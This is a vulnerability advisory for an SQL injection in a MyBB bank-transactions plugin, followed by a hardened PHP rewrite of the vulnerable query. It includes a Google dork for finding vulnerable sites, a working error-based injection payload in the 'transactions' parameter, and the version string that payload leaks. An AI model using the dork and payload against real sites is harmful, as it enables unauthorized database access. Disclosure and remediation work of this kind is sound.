# Exploit Title: MyBB Bank Transactions Plugin SQL Injection
# Google Dork: inurl:bank.php?transactions=
# Date: 13.12.2012
# Exploit Author: limb0
# Vendor Homepage: http://mods.mybb.com/view/transactions
# Software Link: www.kingofpersia.ir
# Version: 2.0
# Category: Web Security
# Tested on: Linux

================================SQLi==============================

Installation:

1: Download the plugin and copy the files into the correct directory.
2: Activate the plugin.

(At this step you may get an error like:

SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM DEFAULT CHARSET=utf8' at line 7

This is caused by the plugin itself. Open bank.php in the /inc/plugins directory and delete this part from every query: "TYPE=MyISAM DEFAULT CHARSET=utf8". When you click Activate again, everything should work.)

------------------------------------------------------------------

The vulnerability is in bank.php. The value of the "transactions" GET parameter is placed into the SQL query without validation or escaping.

Vulnerable lines:

$uid=$_GET['transactions'];
$T_ID=1;
$T_ufetch=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid=$uid ");

-------------------------------------------------------------------

Instructions:

Go to:
/bank.php?transactions=[SQLi]

Example:
/bank.php?transactions=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Result:
1062 - Duplicate entry '5.5.27~1' for key 'group_key'

Proof: http://postimage.org/image/i34m16ejj/
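
The uid lookup from the vulnerable lines above, in a hardened form: the parameter is validated as a positive integer and then bound as a typed query parameter. This is an added example, not code from the plugin or from MyBB; it assumes PDO with the SQLite driver as a stand-in for MyBB's $db object, and the table name mybb_users, its rows, and the helper names parse_uid and fetch_user are constructed for illustration.

```php
<?php
// Added example: hardened form of the uid lookup from bank.php.
// Assumptions: PDO/SQLite stands in for MyBB's $db object; the table
// name and the sample rows below are constructed.

/** Accept only a positive decimal integer; anything else yields null. */
function parse_uid($raw): ?int
{
    $uid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

/** Look up one user row with the uid bound as an integer parameter. */
function fetch_user(PDO $pdo, $raw): ?array
{
    $uid = parse_uid($raw);
    if ($uid === null) {
        return null; // rejected before any SQL is built
    }
    $stmt = $pdo->prepare('SELECT uid, username FROM mybb_users WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE mybb_users (uid INTEGER PRIMARY KEY, username TEXT)');
$pdo->exec("INSERT INTO mybb_users VALUES (1, 'admin'), (2, 'alice')");

// Constructed inputs: a valid uid, an unknown uid, and the request value from
// the advisory as PHP sees it after URL decoding ('+' becomes a space).
$inputs = [
    '2',
    '99',
    '1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--',
];
foreach ($inputs as $raw) {
    $row = fetch_user($pdo, $raw);
    echo str_pad(substr($raw, 0, 20), 22), $row ? $row['username'] : 'rejected / not found', PHP_EOL;
}
```

Either control alone closes this particular hole; using both keeps the query safe if the validation is later loosened or the column type changes.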